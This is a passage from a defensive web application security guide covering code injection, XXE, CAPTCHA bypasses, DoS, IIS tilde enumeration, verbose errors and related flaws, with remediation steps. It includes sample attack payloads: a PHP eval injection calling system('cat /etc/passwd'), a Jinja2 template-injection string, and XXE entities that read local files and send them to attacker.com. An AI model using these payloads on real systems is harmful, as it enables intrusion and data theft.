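    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify the password against a stored hash instead of comparing it inside the SQL.
    if ($user === false || !password_verify($_POST['password'] ?? '', $user['password_hash'])) {
        http_response_code(401);
        exit('Invalid credentials');
    }
?>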

Code Injection

Description

Code Injection is a critical security flaw where an attacker can supply malicious input that the application interprets or executes as code. This occurs in scenarios where user-controlled data is passed to language interpreters, eval functions, or dynamic execution contexts without proper validation or sanitization. By exploiting a code injection vulnerability, attackers can potentially execute arbitrary commands or manipulate the server, gaining full control over the affected application or even the underlying system.

Unlike SQL Injection (focused on databases) or Command Injection (targeting system commands), Code Injection refers specifically to injecting code in the same language as the application runtime (for example, Python, PHP, Ruby, or others). When the server executes the malicious code, attackers can perform unauthorized actions, access sensitive data, or escalate privileges.

Examples

eval() in JavaScript or PHP

A common pattern that leads to Code Injection is the use of eval():

<?php
    // Insecure PHP snippet
    $userInput = $_GET['data'];
    eval("\$variable = $userInput;");
?>

If an attacker passes something like:

?data=system('cat /etc/passwd');

the eval() function attempts to execute the injected code in PHP. Depending on configuration, this could lead to arbitrary command execution or file disclosure.

Unsafe Deserialization

Languages that support serialization (e.g., Java, PHP, Python) can be vulnerable if untrusted data is deserialized without checks. Attackers can craft a malicious serialized payload that, upon deserialization, executes arbitrary code or triggers dangerous application logic. For example, in PHP:

<?php
    // Insecure example of unserializing user data
    $serializedData = $_POST['serialized'];
    $object = unserialize($serializedData);
    // Potentially triggers malicious constructors or methods
?>

If the serialized object contains malicious classes or triggers magic methods, it could lead to code execution within the application.

Template Injection Leading to Code Execution

In some server-side template engines (e.g., Jinja2 in Python, Twig in PHP), an attacker might inject syntax recognized by the template engine, enabling them to execute server-side code. For instance:

# Vulnerable Python with Jinja2
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/')
def index():
    user_input = request.args.get('data')
    template = f"Hello {user_input}!"
    return render_template_string(template)

If render_template_string processes certain Jinja2 constructs without sandboxing, an attacker could supply a payload like:

/?data={{7*7}} or {% if ''.__class__.__mro__[1].__subclasses__()%}...

leading to arbitrary code execution on the server through Python object references.

Remediation

  1. Avoid Insecure Code Evaluation
    • Eliminate or severely restrict the use of functions like eval(), exec(), or similar dynamic code execution methods.
    • If dynamic evaluation is absolutely necessary, strictly validate or sanitize the input beforehand, and consider sandboxing techniques.
  2. Safe Deserialization
    • Avoid deserializing untrusted user input.
    • If deserialization is required, use known-safe formats (e.g., JSON) and verify that the data conforms to expected structures (a minimal sketch follows this list).
    • Use libraries that have built-in safety checks or implement custom validation of deserialized objects.
  3. Use Secure Templating
    • Employ templating systems that automatically escape user inputs and sandbox any code-like expressions.
    • Disallow direct access to critical objects or methods within template contexts.
  4. Input Validation and Sanitization
    • Treat all user-supplied data as untrusted.
    • Validate against expected formats (e.g., numeric ranges, string length constraints) and strip or encode dangerous characters.
    • Use context-appropriate encoding if user input will be inserted into a dynamic execution environment.
  5. Principle of Least Privilege
    • Run the application with the minimum privileges required.
    • Even if Code Injection occurs, restricting privileges reduces the impact—limiting file system access, network capabilities, or system-level actions.
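
A minimal sketch of accepting structured input as JSON instead of a serialized PHP object, as suggested in step 2; the field name is illustrative:

<?php
    // Accept structured input as JSON rather than a PHP serialized object.
    $data = json_decode($_POST['payload'] ?? '', true);

    // Reject anything that does not match the expected structure.
    if (!is_array($data) || !isset($data['title']) || !is_string($data['title'])) {
        http_response_code(400);
        exit('Invalid payload');
    }

    // $data now contains only plain arrays and scalars; no constructors or magic methods run.
    $title = $data['title'];
?>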

Insecure Design

Insecure Design refers to flaws in an application's architecture or logic that create security weaknesses, making it vulnerable to attacks. Unlike implementation bugs, these issues stem from poor security planning, lack of threat modeling, or failing to enforce security principles at the design stage. Insecure design can lead to data exposure, authentication bypasses, privilege escalation, and business logic abuses.

Common Vulnerabilities:

- Lack of Threat Modeling and Security Review in the Development Process
- Missing or Weak Authentication and Authorization Mechanisms
- Flawed Business Logic That Enables Abuses (e.g., bypassing payment verification)
- Inadequate Data Protection Strategies (e.g., storing sensitive data in plaintext)
- Improper Separation of Privileges or Over-Permissioned Accounts
- Lack of Security Controls for API Rate Limiting and Abuse Prevention

To mitigate these risks, applications should incorporate security best practices from the design phase, enforce strong authentication and authorization controls, apply the principle of least privilege, conduct threat modeling, and implement secure coding guidelines. Regular security reviews and testing should be performed to identify and fix architectural flaws before deployment.

CAPTCHA Bypasses

Description

A CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is designed to differentiate legitimate users from automated scripts or bots. However, many CAPTCHA implementations can be bypassed through weaknesses in their design, logic, or integration. Attackers exploit these vulnerabilities to automate form submissions, create fake accounts, or conduct bulk actions without being stopped by the CAPTCHA challenge.

These bypasses often arise from straightforward technical flaws, such as predictable CAPTCHA tokens, insufficient validation on the server side, or reliance on client-side checks. Additionally, more sophisticated attacks may leverage machine learning-based optical character recognition (OCR) or "human-in-the-loop" methods (like paying services or using mechanical turks) to solve CAPTCHAs at scale.

Examples

Predictable or Reusable Tokens

Some CAPTCHAs generate a token or session ID that remains valid for too long or can be replayed:

  • Reused Token: The CAPTCHA token is only validated once on the server side and not invalidated afterward, letting attackers reuse a solved challenge repeatedly.
  • Predictable IDs: If the CAPTCHA's image filenames or parameter strings follow a pattern (e.g., incrementing IDs), attackers may guess and fetch the corresponding solutions.

Client-Side Validation Only

When CAPTCHA verification happens solely in client-side code (e.g., JavaScript), attackers can simply bypass or disable the check. They may manipulate the browser DOM or intercept requests to remove or override the CAPTCHA requirement.

Weak Image/Audio Complexity

If the images or audio challenges are easy to parse, automated OCR or speech-to-text tools can solve CAPTCHAs at high accuracy:

  • Low Distortion: Simple image CAPTCHAs with few overlapping letters or minimal noise are readily solved by modern OCR libraries.
  • Predictable Background: Uniform or lightly varied backgrounds make text extraction straightforward.
  • Simple Audio Challenges: Speech-to-text engines can interpret unmasked spoken digits or phrases with ease.

Human-in-the-Loop Attacks

Attackers often outsource CAPTCHA solving to real human operators:

  • Crowdsourced Services: Attacker scripts forward CAPTCHA challenges to services or "mechanical turk" platforms where low-cost labor solves them rapidly.
  • Phishing or Proxy Tactics: Attackers redirect CAPTCHAs to unsuspecting users (e.g., on a phishing site) who unwittingly solve the challenge for the attacker.

Remediation

  1. Server-Side Enforcement and Validation

    • Validate CAPTCHA tokens exclusively on the server, invalidating them after one use (a minimal sketch follows this list).
    • Do not rely on client-side scripts alone for verifying CAPTCHA results or toggling form submission logic.
  2. Use Secure and Evolving CAPTCHA Mechanisms

    • Employ modern CAPTCHAs that incorporate advanced distortion techniques, multiple challenge types, or adaptive difficulty (e.g., reCAPTCHA).
    • Regularly update and rotate CAPTCHA libraries to stay ahead of automated solvers.
  3. Rate Limiting and Behavior Analysis

    • Implement rate limiting or IP-based throttling to reduce the impact of repeated CAPTCHA bypass attempts.
    • Track user behavior, such as mouse movements or interaction patterns, to detect and block automated scripts.
  4. Short Expiration and Non-Predictable Tokens

    • Generate unpredictable, cryptographically secure tokens for each CAPTCHA instance.
    • Set short expiration times to prevent token reuse or replay attacks.
  5. Multi-Factor or Additional Security Layers

    • Combine CAPTCHAs with other security controls, like email/phone verification or device fingerprinting.
    • Consider multi-factor authentication (MFA) for sensitive actions, minimizing reliance on CAPTCHAs alone.
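
A minimal sketch of one-time, server-side validation in PHP, assuming the expected answer was stored in the session when the challenge was generated:

<?php
    session_start();

    // Validate once, then invalidate so a solved challenge cannot be replayed.
    $expected = $_SESSION['captcha_answer'] ?? null;   // assumed to be set at challenge generation
    $given    = $_POST['captcha'] ?? '';

    unset($_SESSION['captcha_answer']);                // one-time use, even on failure

    if (!is_string($expected) || !hash_equals($expected, $given)) {
        http_response_code(400);
        exit('CAPTCHA validation failed');
    }
?>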

Lack of Rate Limiting

Description

Lack of Rate Limiting (also known as insufficient request throttling) is a vulnerability where a web application or API allows users to make an unlimited number of requests over a short period without restriction. This oversight enables attackers or malicious bots to perform high-volume actions such as brute-forcing credentials, spamming, or launching denial-of-service attacks. Without rate limits, an application may become overwhelmed or experience performance degradation, leading to service outages or unauthorized access to user accounts.

Rate limiting typically involves applying thresholds on how many requests a user (or IP address) can make within a defined timeframe. When these limits are not in place, attackers can systematically abuse application functionality faster than most protective measures or manual detection methods can respond.

Examples

Brute-Force Attacks on Login Pages

If an attacker can attempt thousands of username-password combinations in quick succession, they have a higher chance of guessing valid credentials. Without rate limiting or lockout mechanisms, the attacker faces virtually no barriers.

Enumeration of User IDs or Resources

When an API endpoint allows fetching resource details by ID without restricting request volume, an attacker can quickly loop through possible IDs (e.g., incrementing integers) to scrape sensitive or proprietary information.

Denial-of-Service (DoS) or Resource Exhaustion

Bots or malicious scripts can repeatedly request resource-intensive pages or functions. If the server is unable to throttle the requests, it may become overloaded, impacting legitimate users.

Automated Form Submission and Spam

Forms that accept user-generated content (e.g., comments, posts, messages) can be flooded with spam or malicious links if an attacker can submit them without frequency limits.

Remediation

  1. Implement Request Throttling

    • Use built-in or third-party libraries that monitor request rates and block or delay requests exceeding configured thresholds.
    • Apply thresholds based on IP address, session tokens, or user accounts to prevent large bursts of requests (a minimal sketch follows this list).
  2. Introduce Account Lockouts or Captchas

    • Temporarily lock or challenge user accounts (e.g., via CAPTCHA) after repeated failed login attempts.
    • This step significantly increases the time and effort required for brute-force attacks.
  3. Enforce Strong Authentication and Password Policies

    • Encourage or enforce robust passwords and MFA to reduce the likelihood that brute-force attacks will succeed, even if rate limiting is not fully restrictive.
    • This is a complementary safeguard alongside rate limiting.
  4. Monitor and Alert on Anomalous Traffic

    • Use logging, analytics, and anomaly detection tools to identify surges in request volume or patterns indicative of automated scripts.
    • Generate alerts for high frequencies of requests targeting specific endpoints, allowing administrators to take action quickly.
  5. Layered Approach with Web Application Firewalls (WAF)

    • Configure WAF rules to detect and mitigate excessive requests or repeated patterns aimed at sensitive endpoints.
    • Block or throttle abusive IP addresses or suspicious traffic sources.
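
A minimal sketch of per-IP throttling in PHP, assuming the APCu extension is available; production deployments more commonly rely on a shared store (e.g., Redis), the web server, or a WAF:

<?php
    // Allow at most 100 requests per IP per minute (illustrative limits).
    $key = 'rate:' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown');

    apcu_add($key, 0, 60);        // create the counter with a 60-second TTL if it does not exist
    $count = apcu_inc($key);

    if ($count !== false && $count > 100) {
        http_response_code(429);  // Too Many Requests
        header('Retry-After: 60');
        exit('Rate limit exceeded');
    }
?>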

Sensitive Data Exposure

Description

Sensitive Data Exposure occurs when an application inadvertently discloses confidential or personal information, such as passwords, credit card details, health records, or proprietary business data. This can happen due to improper encryption (or lack thereof), insecure data storage, or insufficient access controls. Attackers exploit these weaknesses to gain unauthorized access to data in transit (e.g., via unsecured HTTP connections) or data at rest (e.g., unencrypted databases, configuration files).

When sensitive data is exposed, the consequences may include identity theft, financial fraud, regulatory penalties, and harm to an organization's reputation. Common causes include failing to use HTTPS, storing passwords in plaintext, or using weak encryption algorithms.

Examples

Unencrypted Connections

If a website transmits login credentials over HTTP rather than HTTPS, an attacker can intercept the data using sniffing tools on the same network. The credentials are then exposed in plaintext.

Plaintext Password Storage

Some applications store user passwords directly in a database without hashing or encryption. If an attacker gains access to the database, they can read every user's password. This also compromises users who reuse passwords on multiple sites.

Sensitive Tokens in URLs or Logs

Applications sometimes include session tokens, API keys, or access tokens within URL parameters. These tokens can appear in server logs, browser history, or referrer headers, exposing them to unintended recipients.

Weak or Deprecated Cryptographic Algorithms

Even if data is encrypted, using older or broken algorithms (e.g., MD5, SHA1, RC4) leaves that data vulnerable to well-known attack methods. Attackers can potentially decrypt or forge data if algorithms lack sufficient cryptographic strength.

Remediation

  1. Use Strong Encryption (Transport Layer Security)

    • Always serve sensitive pages (login, account management) over HTTPS.
    • Prefer TLS 1.2 or higher with secure cipher suites to protect data in transit from eavesdropping and tampering.
  2. Encrypt Sensitive Data at Rest

    • Store passwords using salted, one-way hashing functions (e.g., bcrypt, Argon2, scrypt), as sketched after this list.
    • For other sensitive data (e.g., financial or healthcare records), use robust encryption methods (e.g., AES-256) with secure key management.
  3. Avoid Storing Tokens in Logs or URLs

    • Do not include session IDs, API keys, or other secrets in query parameters. Instead, place them in secure HTTP headers or request bodies.
    • Ensure sensitive data is either masked or omitted in application logs, especially if they might be accessed or shared.
  4. Regularly Update Cryptographic Measures

    • Decommission weak or deprecated algorithms and protocols (SSLv3, TLS 1.0, MD5, etc.).
    • Stay informed about emerging cryptographic vulnerabilities; patch or upgrade your systems promptly.
  5. Implement Strict Access Controls

    • Restrict database access to only authorized users and processes.
    • Apply the principle of least privilege to both your application code and infrastructure.
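
A minimal sketch of password hashing and verification using PHP's built-in bcrypt support:

<?php
    // At registration: store only the salted hash, never the plaintext password.
    $hash = password_hash($_POST['password'] ?? '', PASSWORD_BCRYPT);
    // ... persist $hash to the user record ...

    // At login: compare the submitted password against the stored hash.
    if (password_verify($_POST['password'] ?? '', $hash)) {
        // Authentication succeeded.
    }
?>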

Denial of Service (DoS)

Description

A Denial of Service (DoS) attack aims to render a network or application resource unavailable to its intended users. Attackers typically overwhelm the target with excessive requests, resource-intensive tasks, or exploit a bottleneck in the system's design, causing partial or complete service interruption. This can result in significant downtime, financial losses, and damage to an organization's reputation.

DoS attacks often exploit insufficient resource management or concurrency controls. A single endpoint that triggers an expensive database query, or a file upload function lacking size restrictions, can become a bottleneck when abused by an attacker. In more severe cases, a Distributed Denial of Service (DDoS) employs multiple hosts to send massive traffic simultaneously, making it harder to distinguish legitimate traffic from malicious overload attempts.

Examples

Volumetric Flooding

Attackers generate a high volume of traffic (e.g., HTTP GET requests) to saturate a server's network bandwidth or processing capacity. Without proper rate limiting or filtering, the server becomes overwhelmed and unable to handle legitimate requests.

Resource-Intensive Endpoints

Some requests—such as complex database queries, file compression, or image resizing—require significant CPU or memory. Attackers can exploit these endpoints by sending repeated or large requests, causing the system to run out of resources.

Slowloris (Slow HTTP Attacks)

Attackers keep many connections open by sending partial HTTP requests slowly, preventing the server from closing these connections. Over time, the server runs out of available connections, denying new incoming legitimate requests.

Application Logic Loops

If an application has a poorly designed workflow (e.g., redirect loops or nested operations triggered by a single request), attackers can craft requests that repeatedly trigger resource-heavy processes, resulting in denial of service.

Remediation

  1. Rate Limiting and Throttling

    • Enforce limits on how many requests an IP or user can make within a specific time window (see the sketch after this list).
    • Configure backoff algorithms or request queuing to balance incoming traffic.
  2. Use a Content Delivery Network (CDN)

    • Offload static content (images, scripts, styles) to CDN nodes, reducing the load on your origin server.
    • Many CDNs also provide DDoS protection, filtering out malicious traffic before it reaches your server.
  3. Implement Resource Constraints

    • Configure maximum file upload sizes, limit recursion or loop depth in server-side code, and ensure timeouts for long-running requests.
    • Use defensive measures like circuit breakers or graceful degradation to keep the system responsive under heavy load.
  4. Apply Web Application Firewall (WAF) and Intrusion Detection

    • Deploy WAF rules to identify and block known DoS patterns or suspicious traffic spikes.
    • Use Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) to monitor and mitigate threats in real time.
  5. Scalable Infrastructure

    • Design your application to scale horizontally, adding more servers or containers as traffic grows.
    • Use load balancers that distribute requests evenly and detect overloaded instances.
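
As a sketch of step 1, the following in-memory Flask example (Flask is assumed; the limits are illustrative) rejects clients that exceed a fixed request budget per time window. Production deployments typically enforce this at a reverse proxy, API gateway, or WAF backed by a shared store, but the principle is the same.

import time
from collections import defaultdict, deque

from flask import Flask, abort, request

app = Flask(__name__)

WINDOW_SECONDS = 60
MAX_REQUESTS = 100            # per client IP per window (illustrative)
hits = defaultdict(deque)     # client IP -> timestamps of recent requests

@app.before_request
def rate_limit():
    now = time.time()
    recent = hits[request.remote_addr]
    while recent and now - recent[0] > WINDOW_SECONDS:
        recent.popleft()      # discard requests outside the window
    if len(recent) >= MAX_REQUESTS:
        abort(429)            # 429 Too Many Requests
    recent.append(now)

@app.route("/")
def index():
    return "ok"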

Security Misconfiguration

Security Misconfiguration occurs when applications, servers, or frameworks are deployed with insecure default settings, exposed configurations, or improperly set permissions, making them vulnerable to attacks. These misconfigurations often result from unnecessary features, excessive privileges, outdated software, or lack of security hardening, leading to data leaks, unauthorized access, and system compromise.

Common Vulnerabilities:

- Exposed Debug or Error Messages Containing Sensitive Information
- Default Credentials or Weak Authentication Configurations
- Overly Permissive Permissions on Files, Directories, or Cloud Resources
- Unpatched or Outdated Software with Known Vulnerabilities
- Misconfigured Security Headers (Missing CSP, HSTS, or X-Frame-Options)
- Unrestricted Access to Admin Panels or APIs

To mitigate these risks, applications should disable unnecessary features, enforce secure authentication and access controls, regularly update and patch software, configure security headers properly, and perform security audits to detect misconfigurations. Automating configuration management and using security baselines can further reduce exposure to misconfigurations.

XML External Entity (XXE)

Description

XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to external entities. By manipulating these external entity declarations, attackers can read local files, initiate network requests from the server, or in more severe cases, achieve remote code execution. XXE typically exploits parsing libraries or features in XML processors that automatically retrieve external resources without sufficient validation or restriction.

These attacks are particularly dangerous because XML parsers, by default, may expand entities, download remote content, or even parse system files. If an attacker can control or supply XML data (e.g., via file uploads or API calls), and the server does not securely configure its XML parser, the attacker can exploit XXE to exfiltrate sensitive data or interact with internal services.

Examples

Classic XXE Payload

A typical XXE attack might embed a DOCTYPE declaration that references a system file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure XML parser processes this, it attempts to read /etc/passwd from the server's file system, then includes its content in the parsed output. The attacker can thereby access sensitive local files.
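
By contrast, a hardened parser refuses to expand such entities at all. The following minimal Python sketch, which assumes the third-party defusedxml package, shows the same style of payload being rejected instead of expanded:

import defusedxml.ElementTree as ET
from defusedxml import EntitiesForbidden

payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""

try:
    ET.fromstring(payload)   # entity definitions are forbidden by default
except EntitiesForbidden:
    print("Rejected: document defines XML entities")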

Blind XXE Over HTTP

Attackers can force an XML parser to load an external resource from a remote server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/secret?file=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Even if the application's response does not directly return the file contents, the attacker's server receives a request that leaks metadata (like which files exist or open ports) or exfiltrates data, depending on the parser's behavior.

Parameter Entity Injection

Some XML parsers allow parameter entities in the DTD, which can be used to smuggle additional entity declarations and exfiltrate local data (such as the hostname read below):

<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?host=%file;'>">
  %eval;
]>
<root>&exfil;</root>

This sequence can initiate network requests containing sensitive server data to an external URL.

Remediation

  1. Disable External Entity Resolution

    • Configure the XML parser to disallow or ignore external entities.
    • For example, in Java, disable DTDs and set XMLConstants.FEATURE_SECURE_PROCESSING to true.
    • Each language or parser typically offers parameters or flags to turn off external entity expansion.
  2. Use Less Complex Data Formats

    • Where possible, avoid using XML and its complex features.
    • Consider JSON or other formats that do not include entity expansion by default, reducing attack surface.
  3. Implement Whitelisting and Validation

    • If external entities are strictly required, configure a whitelist of allowed resources or schemas.
    • Validate XML input against a secure schema that disallows external references.
  4. Enforce Least Privilege and Sandboxing

    • Run the application with minimal file system and network privileges so that even if XXE is attempted, it has limited access to files or internal endpoints.
    • Use containerization or chroot environments to restrict the application's view of the file system.

Default Configurations

Description

Default Configurations refer to the out-of-the-box settings, credentials, or functionality provided by software, frameworks, or systems upon initial installation. These default settings often prioritize ease of setup and might not be sufficiently hardened for a production environment. Attackers capitalize on well-known default usernames, passwords, configurations, or open ports to gain unauthorized access or to perform further exploits.

Developers and system administrators frequently overlook changing these defaults during deployment, leaving sensitive services exposed with predictable or weak security settings. By using publicly available documentation or scanning tools, attackers can quickly identify systems running default configurations and compromise them with minimal effort.

Examples

Default Administrative Credentials

Some content management systems (CMS), routers, or database servers ship with credentials like admin/admin or root/root. If administrators do not promptly replace these credentials, attackers can easily log in and gain control over the system.

Unsecured Default Ports or Protocols

Common services or software might run on their default ports with no authentication requirements (e.g., unauthenticated database ports, open debugging interfaces). Attackers can scan the network to locate these services and exploit them if no additional security measures are in place.

Misconfigured Web Application Frameworks

In certain web frameworks, sample pages or APIs are enabled by default for demonstration. These sample endpoints can expose debug information, version details, or even privileged actions. If they remain active in production, attackers can probe them for vulnerabilities.

Remediation

  1. Change Default Credentials Immediately

    • Upon installation, update all administrator and service accounts with strong, unique passwords.
    • Disable or remove any default or guest accounts not actively in use.
  2. Harden Configuration Settings

    • Review and configure each service's security options – enable authentication mechanisms, restrict permissions, and implement secure communication protocols.
    • Disable or remove default "example" applications, sample endpoints, or test data that are not needed in production.
  3. Restrict Network Access

    • Limit access to sensitive ports by using firewalls, security groups, or network segmentation.
    • Close or change default ports where possible to obscure standard attack vectors.
  4. Follow Vendor and Community Best Practices

    • Consult official documentation or trusted community guidelines on securing the specific software or service.
    • Stay informed about known default settings or vulnerabilities and apply recommended mitigations or patches.

IIS Tilde Enumeration

Description

IIS Tilde Enumeration (sometimes referred to as the IIS Short Filename Vulnerability) leverages how Windows systems historically support 8.3 short filenames. When running Microsoft Internet Information Services (IIS), attackers can use requests referencing truncated directory or file names that include a tilde character (~), such as FOLDER~1, to probe for the existence of hidden directories or files. By systematically guessing these short names, an attacker may discover sensitive paths or filenames that should not be publicly exposed.

This issue stems from legacy DOS-compatible naming schemes in Windows. If short filename creation is enabled on the file system, each long filename also has an 8.3-compatible alias. IIS, depending on its configuration, may respond differently when a correct or incorrect short name is requested, thus exposing otherwise undisclosed directory or file structures.

Examples

Discovering Hidden Folders

If the legitimate folder on the server is SecretAdmin, the 8.3 short name might be SECRE~1. An attacker might probe the server with URLs like:

GET /SECRE~1/ HTTP/1.1
Host: example.com

  • If the server responds with a 200 OK (or a 403/401 implying it exists but is restricted), the attacker learns the folder likely exists.
  • If it responds with a 404 Not Found, the guess was incorrect and they move on to another short name guess.

Enumerating File Names

Similarly, if a file is named ImportantConfig.txt in the Config directory, the attacker might test requests for IMPOR~1.TXT in that directory:

GET /Config/IMPOR~1.TXT HTTP/1.1
Host: example.com

Differences in the server's response codes or error messages can reveal the presence of that file even if it is not directly linked anywhere on the site.
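
Testers can reproduce this behaviour with a short script. The sketch below uses Python with the third-party requests library; the candidate short names are hypothetical guesses, and any guess that does not come back as 404 is flagged for manual review.

import requests  # third-party HTTP client, assumed installed

BASE = "https://example.com"
CANDIDATES = ["SECRE~1", "CONFIG~1", "BACKUP~1"]   # hypothetical 8.3 guesses

for name in CANDIDATES:
    resp = requests.get(f"{BASE}/{name}/", allow_redirects=False, timeout=5)
    # 404 usually means the short name does not exist;
    # 200/301/401/403 responses suggest the resource is present
    if resp.status_code != 404:
        print(f"Possible hit: /{name}/ -> {resp.status_code}")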

Remediation

  1. Disable 8.3 Filename Creation

    • If your Windows version and application setup allow it, you can disable 8.3 short file name generation on new volumes using registry settings or system policies.
    • (Be mindful that changing this setting may impact legacy applications.)
    • For example, on some Windows systems, you can modify:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
    NtfsDisable8dot3NameCreation = 1
    
  2. Apply Security Patches and Updates

    • Ensure you are running a fully updated version of IIS and Windows.
    • Microsoft has released updates over time that reduce the leak of file or directory info via the short name mechanism.
  3. Restrict Folder and File Access

    • Use proper Access Control Lists (ACLs) to lock down sensitive directories and files, preventing unauthorized access even if short filename enumeration reveals their existence.
    • Set up robust authorization checks within IIS to ensure only intended users can access critical resources.

Verbose Error Messages

Description

Verbose Error Messages occur when an application reveals overly detailed information about its internal processes, configurations, or database schemas in error responses. While error reporting and debugging are essential during development, leaving them active in a production environment can expose sensitive details such as stack traces, SQL queries, server file paths, or system configuration settings. Attackers can leverage this information to identify potential vulnerabilities, refine their exploit attempts, or gain insights into the system's structure.

Excessive detail in error messages can arise from default framework configurations, unhandled exceptions, or logging/monitoring tools that are not tailored for production use. Ensuring that public-facing errors remain generic—while still logging useful data in a secure location—is crucial for preventing information leakage.

Examples

Unhandled Exception Stack Traces

An application might throw a runtime exception that returns a full stack trace to the user's browser. For instance, a .NET or Java error page shows class names, line numbers, and even library versions. Attackers can identify the framework in use, discover the file structure, or pinpoint the vulnerable method.

Database Query Errors

When a SQL query fails, an application may respond with a detailed message such as:

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in 
your SQL syntax near 'FROM users WHERE id= ' at line 1

This reveals the query structure (e.g., table names, SQL fragments), giving attackers a blueprint for SQL injection attempts.

Configuration or Path Leakage

In some error conditions, the application could reveal file system paths or server configuration details (e.g., /var/www/myapp/config.php). Attackers can use these paths to probe for specific files or gather more details about the server's environment.

Remediation

  1. Customize and Restrict Error Messages

    • Display user-friendly, generic error messages in production environments that do not disclose technical details.
    • Provide only high-level information such as "An unexpected error has occurred" or "Unable to process your request."
  2. Secure Exception Handling

    • Implement global exception handlers or middleware that catch errors and control how they are presented to end users (see the sketch after this list).
    • Use structured logging to record the full stack trace or debug info internally but do not show it publicly.
  3. Use Different Configurations for Development and Production

    • In frameworks like Django, Rails, or Express, ensure that debug settings are disabled in production.
    • Production mode typically suppresses verbose error messages and stack traces by default.
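
A minimal Flask sketch (Flask is assumed) of the pattern described in step 2: the full details go to an internal log, while the client only ever sees a generic message.

import logging

from flask import Flask, jsonify

app = Flask(__name__)
logging.basicConfig(filename="app.log", level=logging.ERROR)

@app.errorhandler(Exception)
def handle_unexpected_error(exc):
    # Full stack trace is recorded internally only
    app.logger.exception("Unhandled exception")
    # The client receives a generic message with no technical detail
    return jsonify(error="An unexpected error has occurred"), 500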

Stack Traces

Description

Stack traces provide detailed information about a program's execution path at the moment an exception or error occurs. In a development environment, this information is invaluable for debugging, showing which functions were called, on which lines errors occurred, and sometimes which libraries or framework versions are in use. However, when applications expose stack traces in production, attackers can glean critical details about server configurations, file paths, database structure, or underlying frameworks. This in-depth insight can be used to plan targeted attacks, exploit known vulnerabilities, or map out potential points of entry.

Often, stack trace exposure stems from misconfigured error-handling settings, unhandled exceptions, or debug modes inadvertently left enabled in a live environment. Minimizing or hiding these traces from end users (while still logging them securely for developers) is a key practice in application security.

Examples

Full Framework Trace

A Java application throws a NullPointerException that's not caught by any custom error handler, causing a default Tomcat/Java error page to be displayed:

java.lang.NullPointerException
    at com.example.app.UserService.getUserById(UserService.java:45)
    at com.example.app.UserController.handleRequest(UserController.java:67)
    ...

This reveals class names, method names, and file locations. Attackers learn about the application's internal package structure, potentially identifying classes or services that may have known vulnerabilities.

Python Traceback with Library Versions

A Flask application running in debug mode returns a detailed Python traceback, including environment details:

Traceback (most recent call last):
  File "/path/to/flask/app.py", line 200, in create_user
    user = User(name=request.form['username'])
KeyError: 'username'

In addition to code specifics (like line numbers), the traceback may display the versions of Python, Flask, or other libraries—helping attackers check for unpatched vulnerabilities in those dependencies.

Hidden Configuration Data

Sometimes stack traces include environment variables or sensitive connection strings if these variables are referenced directly in the error path. For instance, a database connection error might display the full connection URL, username, or partial passwords.

Remediation

  1. Use Production-Grade Error Handling

    • Disable debug or developer modes in production. Many frameworks (Spring Boot, Express.js, Django, Rails) offer a separate production configuration that suppresses stack traces in user-facing responses.
  2. Implement Custom Error Pages

    • Catch and handle all exceptions within application code or through a global error-handling mechanism (middleware, filters, decorators).
    • Provide only generic error messages to the user, such as "An error occurred" or "Something went wrong."
  3. Log Internally, Not Publicly

    • Store detailed stack traces and debug logs in server-side log files or centralized logging systems (e.g., ELK stack, Splunk).
    • Ensure these logs are only accessible to authorized administrators or developers.

Server Fingerprinting

Description

Server Fingerprinting is the process by which an attacker (or researcher) gathers information about a server's software, operating system, and version details—often through subtle indicators in responses or network behavior. This information can then be used to identify known vulnerabilities, tailor exploit strategies, or bypass certain security controls. Common ways of performing server fingerprinting include analyzing HTTP response headers, banners, error messages, and TLS/SSL handshakes, as well as using specialized scanning tools that probe multiple protocols.

In environments where default server banners are left intact or where HTTP headers explicitly declare software versions, attackers can quickly recognize the server type and version (e.g., "Apache/2.4.41 (Ubuntu)"). Even slight timing differences in responses or unique quirks in the way a server handles malformed requests can serve as a signature for advanced fingerprinting techniques.

Examples

HTTP Banner Disclosure

Some web servers or frameworks include version details in their HTTP response headers:

Server: Apache/2.4.41 (Ubuntu)

An attacker who sees "Apache/2.4.41" might check for any known security vulnerabilities associated with that version of Apache, increasing the likelihood of a successful exploit.
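
A quick way to check what your own server discloses is to inspect its response headers. Here is a minimal Python sketch using the third-party requests library; the header names shown are common offenders, not an exhaustive list.

import requests  # third-party HTTP client, assumed installed

resp = requests.head("https://example.com", timeout=5)
# Headers that commonly leak software or version information
for header in ("Server", "X-Powered-By", "X-AspNet-Version"):
    print(f"{header}: {resp.headers.get(header, '(not sent)')}")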

Error Page Signatures

When an unhandled exception or error occurs, the server might return a page indicating the software stack and version (e.g., Tomcat 9.0.37, Nginx 1.18.0). Attackers use these clues to pinpoint the exact environment, guiding further attacks or zero-day exploit searches.

TLS/SSL Handshake Anomalies

By analyzing the order or type of ciphers and extensions offered during a TLS handshake, sophisticated scanners can guess which server or library version (e.g., OpenSSL, GnuTLS, or Microsoft SChannel) is in use, thereby identifying potential cryptographic vulnerabilities.

Remediation

  1. Obscure or Remove Version Information

    • Configure servers to suppress or modify the Server header or any banner strings that reveal the software version.
    • Use generic header values (e.g., "Server: Apache") or remove them entirely if the application still functions correctly without disclosing version details.
  2. Handle Errors with Generic Responses

    • Implement custom error handling so that stack traces, server names, or framework identifiers are not exposed.
    • Provide user-friendly but generic error messages, and log details internally instead of revealing them in public responses.
  3. Harden TLS/SSL Configuration

    • Update or replace outdated cryptographic libraries and ensure only modern ciphers are used.
